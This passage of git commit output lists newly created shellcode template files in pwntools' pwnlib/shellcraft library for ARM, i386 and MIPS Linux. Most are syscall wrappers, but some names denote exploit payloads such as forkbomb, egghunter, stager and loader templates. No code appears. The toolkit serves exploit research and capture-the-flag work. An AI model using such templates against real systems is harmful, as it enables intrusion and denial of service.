pwnlib/shellcraft/templates/arm/linux/epoll_wait.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/execve.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/exit.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/faccessat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/fallocate.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/fchdir.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/fchmod.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/fchmodat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/fchown.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/fchownat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/fcntl.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/fdatasync.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/flock.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/fork.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/forkbomb.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/forkexit.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/fstat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/fstat64.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/fstatat64.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/fsync.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/ftruncate.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/ftruncate64.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/futimesat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getcwd.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getdents.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getegid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/geteuid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getgid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getgroups.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getitimer.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getpeername.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getpgid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getpgrp.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getpid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getpmsg.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getppid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getpriority.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getresgid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getresuid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getrlimit.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getrusage.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getsid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getsockname.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getsockopt.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/gettimeofday.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/getuid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/gtty.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/ioctl.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/ioperm.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/iopl.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/kill.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/killparent.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/lchown.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/link.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/linkat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/listen.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/lseek.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/lstat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/lstat64.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/madvise.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/mincore.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/mkdir.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/mkdirat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/mknod.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/mknodat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/mlock.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/mlockall.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/mmap.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/mprotect.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/mq_notify.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/mq_open.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/mq_timedreceive.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/mq_timedsend.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/mq_unlink.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/mremap.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/msync.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/munlock.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/munlockall.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/munmap.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/nanosleep.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/nice.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/open.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/openat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/pause.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/pipe.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/pipe2.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/poll.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/ppoll.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/prctl.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/pread.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/preadv.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/prlimit64.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/profil.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/ptrace.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/putpmsg.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/pwrite.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/pwritev.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/readahead.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/readdir.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/readlink.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/readlinkat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/readv.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/recv.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/recvfrom.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/recvmmsg.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/recvmsg.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/remap_file_pages.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/rename.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/renameat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/rmdir.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sched_get_priority_max.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sched_get_priority_min.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sched_getaffinity.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sched_getparam.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sched_getscheduler.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sched_rr_get_interval.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sched_setaffinity.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sched_setparam.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sched_setscheduler.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sched_yield.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/select.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sendfile.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sendfile64.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/setdomainname.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/setgid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/setgroups.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sethostname.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/setitimer.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/setpgid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/setpriority.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/setregid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/setresgid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/setresuid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/setreuid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/setrlimit.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/setsid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/setsockopt.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/setsockopt_timeout.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/settimeofday.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/setuid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sigaction.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sigaltstack.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/signal.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sigpending.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sigprocmask.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sigsuspend.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/splice.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/stat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/stat64.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/stime.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/stty.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/symlink.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/symlinkat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sync.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/sync_file_range.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/syslog.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/tee.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/time.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/timer_create.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/timer_delete.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/timer_getoverrun.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/timer_gettime.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/timer_settime.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/truncate.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/truncate64.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/ulimit.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/umask.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/uname.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/unlink.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/unlinkat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/unshare.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/ustat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/utime.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/utimensat.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/utimes.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/vfork.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/vhangup.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/vmsplice.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/wait4.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/waitid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/waitpid.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/write.asm create mode 100644 pwnlib/shellcraft/templates/arm/linux/writev.asm create mode 100644 pwnlib/shellcraft/templates/arm/memcpy.asm create mode 100644 pwnlib/shellcraft/templates/arm/setregs.asm create mode 100644 pwnlib/shellcraft/templates/arm/udiv_10.asm create mode 100644 pwnlib/shellcraft/templates/arm/xor.asm create mode 100644 pwnlib/shellcraft/templates/i386/cgc/__doc__ create mode 100644 pwnlib/shellcraft/templates/i386/cgc/allocate.asm create mode 100644 pwnlib/shellcraft/templates/i386/cgc/cat.asm create mode 100644 pwnlib/shellcraft/templates/i386/cgc/deallocate.asm create mode 100644 pwnlib/shellcraft/templates/i386/cgc/fdwait.asm create mode 100644 pwnlib/shellcraft/templates/i386/cgc/random.asm create mode 100644 pwnlib/shellcraft/templates/i386/cgc/receive.asm create mode 100644 pwnlib/shellcraft/templates/i386/cgc/sendfile.asm create mode 100644 pwnlib/shellcraft/templates/i386/cgc/syscall.asm create mode 100644 pwnlib/shellcraft/templates/i386/cgc/terminate.asm create mode 100644 pwnlib/shellcraft/templates/i386/cgc/transmit.asm create mode 100644 pwnlib/shellcraft/templates/i386/crash.asm create mode 100644 pwnlib/shellcraft/templates/i386/epilog.asm create mode 100644 pwnlib/shellcraft/templates/i386/function.asm create mode 100644 pwnlib/shellcraft/templates/i386/getpc.asm create mode 100644 pwnlib/shellcraft/templates/i386/itoa.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/accept.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/access.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/acct.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/alarm.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/bind.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/brk.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/chdir.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/chmod.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/chown.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/chroot.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/clock_getres.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/clock_gettime.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/clock_nanosleep.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/clock_settime.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/clone.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/close.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/creat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/dir.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/dup2.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/dup3.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/dupio.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/egghunter.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/epoll_create.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/epoll_create1.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/epoll_ctl.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/epoll_pwait.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/epoll_wait.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/execve.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/faccessat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/fallocate.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/fchdir.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/fchmod.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/fchmodat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/fchown.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/fchownat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/fcntl.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/fdatasync.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/flock.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/fork.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/forkbomb.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/forkexit.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/fstat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/fstat64.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/fstatat64.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/fsync.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/ftruncate.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/ftruncate64.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/futimesat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getcwd.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getegid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/geteuid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getgid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getgroups.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getitimer.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getpeername.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getpgid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getpgrp.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getpid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getpmsg.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getppid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getpriority.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getresgid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getresuid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getrlimit.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getrusage.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getsid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getsockname.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getsockopt.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/gettimeofday.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/getuid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/gtty.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/ioctl.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/ioperm.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/iopl.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/kill.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/killparent.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/lchown.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/link.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/linkat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/listen.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/loader.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/loader_append.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/lseek.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/lstat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/lstat64.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/madvise.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/mincore.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/mkdir.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/mkdirat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/mknod.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/mknodat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/mlock.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/mlockall.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/mmap.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/mprotect.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/mq_notify.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/mq_open.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/mq_timedreceive.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/mq_timedsend.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/mq_unlink.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/mremap.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/msync.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/munlock.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/munlockall.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/munmap.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/nanosleep.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/nice.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/open.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/openat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/pause.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/pidmax.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/pipe.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/pipe2.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/poll.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/ppoll.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/prctl.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/pread.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/preadv.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/prlimit64.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/profil.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/ptrace.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/putpmsg.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/pwrite.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/pwritev.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/readahead.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/readdir.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/readlink.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/readlinkat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/readn.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/readv.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/recv.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/recvfrom.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/recvmmsg.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/recvmsg.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/remap_file_pages.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/rename.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/renameat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/rmdir.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sched_get_priority_max.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sched_get_priority_min.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sched_getaffinity.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sched_getparam.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sched_getscheduler.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sched_rr_get_interval.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sched_setaffinity.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sched_setparam.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sched_setscheduler.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sched_yield.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/select.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sendfile.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sendfile64.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/setdomainname.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/setgid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/setgroups.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sethostname.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/setitimer.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/setpgid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/setpriority.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/setresgid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/setresuid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/setrlimit.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/setsid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/setsockopt.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/setsockopt_timeout.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/settimeofday.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/setuid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sigaction.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sigaltstack.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/signal.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sigpending.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sigprocmask.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sigsuspend.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/socket.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/socketcall.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/splice.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/stage.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/stat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/stat64.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/stime.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/stty.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/symlink.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/symlinkat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sync.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/sync_file_range.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/syslog.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/tee.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/time.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/timer_create.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/timer_delete.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/timer_getoverrun.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/timer_gettime.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/timer_settime.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/truncate.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/truncate64.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/ulimit.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/umask.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/uname.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/unlink.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/unlinkat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/unshare.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/ustat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/utime.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/utimensat.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/utimes.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/vfork.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/vhangup.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/vmsplice.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/wait4.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/waitid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/waitpid.asm create mode 100644 pwnlib/shellcraft/templates/i386/linux/writev.asm create mode 100644 pwnlib/shellcraft/templates/i386/memcpy.asm create mode 100644 pwnlib/shellcraft/templates/i386/prolog.asm create mode 100644 pwnlib/shellcraft/templates/i386/pushstr_array.asm create mode 100644 pwnlib/shellcraft/templates/i386/stackarg.asm create mode 100644 pwnlib/shellcraft/templates/i386/strcpy.asm create mode 100644 pwnlib/shellcraft/templates/i386/strlen.asm create mode 100644 pwnlib/shellcraft/templates/i386/xor.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/accept.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/access.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/acct.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/alarm.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/bind.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/brk.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/cat.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/chdir.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/chmod.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/chown.asm create mode 100644 pwnlib/shellcraft/templates/mips/linux/chroot.asm create mode 100644 